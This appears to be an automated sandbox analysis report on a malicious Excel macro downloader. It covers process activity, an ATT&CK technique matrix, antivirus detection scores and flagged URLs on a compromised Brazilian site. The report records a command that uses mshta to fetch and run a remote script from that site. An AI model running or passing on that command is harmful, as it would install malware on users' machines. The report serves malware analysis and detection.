Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
Path Interception11
Process Injection
1
Masquerading
1
Input Capture
1
Virtualization/Sandbox Evasion
Remote Services1
Email Collection
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Command and Scripting Interpreter
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Modify Registry
LSASS Memory11
Remote System Discovery
Remote Desktop Protocol1
Input Capture
Exfiltration Over Bluetooth4
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts121
Scripting
Logon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
System Network Configuration Discovery
SMB/Windows Admin Shares1
Archive Collected Data
Automated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts23
Exploitation for Client Execution
Logon Script (Mac)Logon Script (Mac)11
Disable or Modify Tools
NTDS1
File and Directory Discovery
Distributed Component Object Model1
Clipboard Data
Scheduled Transfer14
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets14
System Information Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common121
Scripting
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Obfuscated Files or Information
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls49%VirustotalBrowse
SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls27%MetadefenderBrowse
SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls41%ReversingLabsScript-Macro.Downloader.Amphitryon
SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls100%AviraX97M/Agent.9944011
SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
facextrade.com.br5%VirustotalBrowse
storage.ie6countdown.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0ver=5.0.3yT100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextra100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0rj100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/1L100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0cumO100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txts.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0n.css))T100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0ET4.0C;100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1100%Avira URL Cloudmalware
https://facextrade.com.br/#estruturajs?ver=1.0.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3100%Avira URL Cloudmalware
http://kyruus.com0%URL Reputationsafe
http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1100%Avira URL Cloudmalware
https://facextrade.com.br/feed/100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0Nm100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png1.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/t-lazy-sr100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2WI100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txt.6.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2$100%Avira URL Cloudmalware
https://facextrade.com.br/#contatos9100%Avira URL Cloudmalware
https://facextrade.com.br/#portfolio_section1.24100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngery.flexslider-min.js?100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txtmshta100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)l100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2ET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0(100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4.txtsmshta100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00eEve100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2Pc100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.202.1b100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/style.csssY100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes=JW&n?H4~b100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.csss100%Avira URL Cloudmalware
http://daneden.me/animate0%URL Reputationsafe
http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0r100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0nl100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/privacy-policy100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.319100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css_&100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3n.js?ver=1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20R$100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/4100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/:100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/style.css...100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0http://facextrade.c100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204172.1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201A100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20WV100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/privacy-policyflate100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20Time.js?ver=1.08100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.22W100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20css100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsJl100%Avira URL Cloudmalware
https://facextrade.com.br/on100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30.6100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
facextrade.com.br
187.45.240.69
truetrueunknown
gstaticadssl.l.google.com
172.217.16.195
truefalse
    high
    netdna.bootstrapcdn.com
    104.18.11.207
    truefalse
      high
      www3.l.google.com
      142.250.181.238
      truefalse
        high
        storage.ie6countdown.com
        unknown
        unknownfalseunknown
        translate.google.com
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.csstrue
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngtrue
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0true
          • Avira URL Cloud: malware
          unknown
          http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0true
          • Avira URL Cloud: malware
          unknown
          https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2false
            high
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jstrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0true
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.csstrue
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0ver=5.0.3yTmshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextramshta.exe, 00000008.00000002.1168486528.0000000002D48000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0rjmshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/1Lmshta.exe, 00000008.00000002.1180881950.0000000006D13000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png4.0E)mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://g.co/dev/maps-no-accountmshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201.0mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0cumOmshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://facextrade.com.br/wp-includes/certificates/4.txts.0mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.opensource.org/licenses/mit-license.phpmshta.exe, 00000008.00000002.1186574791.0000000009C8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, camera.min[1].js.8.dr, swfobject[1].js.8.dr, jplayer.playlist.min[1].js.8.drfalse
                high
                http://twitter.com/fontawesome.mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drfalse
                  high
                  https://geo1.ggpht.com/cbknmshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0n.css))Tmshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0ET4.0C;mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingmshta.exe, 00000008.00000003.939879199.0000000000287000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://facextrade.com.br/#estruturajs?ver=1.0.0mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://github.com/joeldbirch/onHoverIntentmshta.exe, 00000008.00000002.1185420355.0000000009AF9000.00000004.00000020.00020000.00000000.sdmp, superfish[1].js.8.drfalse
                        high
                        https://support.google.com/fusiontables/answer/9185417).mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://kyruus.commshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drfalse
                          • URL Reputation: safe
                          unknown
                          https://facextrade.com.br/feed/mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0Nmmshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png1.0mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-includes/certificates/t-lazy-srmshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2WImshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-includes/certificates/4.txt.6.0mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2$mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://facextrade.com.br/#contatos9mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://facextrade.com.br/#portfolio_section1.24mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngery.flexslider-min.js?mshta.exe, 00000008.00000002.1175277603.000000000528C000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0.NET4.0E)mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://info.template-help.com/help/style[1].css.8.drfalse
                            high
                            http://facextrade.com.br/wp-includes/certificates/4.txtmshtamshta.exe, 00000008.00000002.1165602008.0000000000320000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://github.com/joeldbirch/onHoverIntent3mshta.exe, 00000008.00000003.1037660895.000000000382A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039017067.000000000382C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038851345.000000000382B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170800574.000000000382D000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)lmshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2ET4.0E)mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.gnu.org/copyleft/gpl.htmlmshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, jplayer.playlist.min[1].js.8.drfalse
                                high
                                http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0(mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://facextrade.com.br/wp-includes/certificates/4.txtsmshtacmd.exe, 00000002.00000002.1165242913.000000000040E000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00eEvemshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://vimeo.com/channels/:channel/:idmshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drfalse
                                  high
                                  https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsersmshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2Pcmshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6.NET4.0E)mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
